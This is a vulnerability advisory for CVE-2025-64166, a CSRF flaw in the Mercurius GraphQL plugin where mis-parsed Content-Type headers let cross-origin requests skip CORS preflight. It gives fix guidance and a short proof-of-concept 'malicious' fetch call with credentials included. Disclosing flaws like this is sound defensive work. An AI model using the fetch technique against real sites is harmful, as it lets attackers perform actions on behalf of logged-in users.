CVE-2025-64166
Mercurius: Incorrect Content-Type parsing can lead to CSRF attack
Description
### Summary A Cross-Site Request Forgery (CSRF) vulnerability was identified in Mercurius versions 16. The issue arises from incorrect parsing of the `Content-Type` header in requests. Specifically, requests with `Content-Type` values such as `application/x-www-form-urlencoded`, `multipart/form-data`, or `text/plain` could be misinterpreted as `application/json`. This misinterpretation bypasses the preflight checks performed by the `fetch()` API, potentially allowing unauthorized actions to be performed on behalf of an authenticated user. --- ### Impact An attacker could exploit this vulnerability by crafting a malicious request with a `Content-Type` that Fastify incorrectly parses as `application/json`. When such a request is made from a different origin, it bypasses the Cross-Origin Resource Sharing (CORS) protections, leading to a potential CSRF attack. This could result in unauthorized actions being performed on behalf of an authenticated user without their consent. --- ### Proof of Concept ```javascript // Server-side Fastify setup const Fastify = require('fastify'); const mercurius = require('mercurius'); const app = Fastify(); const schema = ` type Query { hello(name: String): String } `; const resolvers = { Query: { hello: (_, { name }) => `Hello ${name || 'World'}!` } }; app.register(mercurius, { schema, resolvers }); app.listen(3000, () => { console.log('Server listening on http://localhost:3000'); }); ``` ```javascript // Malicious client-side code fetch('http://localhost:3000/graphql', { method: 'POST', body: JSON.stringify({ query: '{ hello(name: "attacker") }' }), headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, credentials: 'include' }); ``` In the above example, the malicious request is crafted to exploit the CSRF vulnerability by using a `Content-Type` that Fastify incorrectly parses as `application/json`. --- ### Mitigation To address this vulnerability, CSRF protection has been implemented. ## References * https://github.com/mercurius-js/mercurius/pull/1187
How to fix CVE-2025-64166
To remediate CVE-2025-64166, upgrade the affected package to a fixed version below.
- —upgrade to 16.4.0 or later
Is CVE-2025-64166 being exploited?
Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.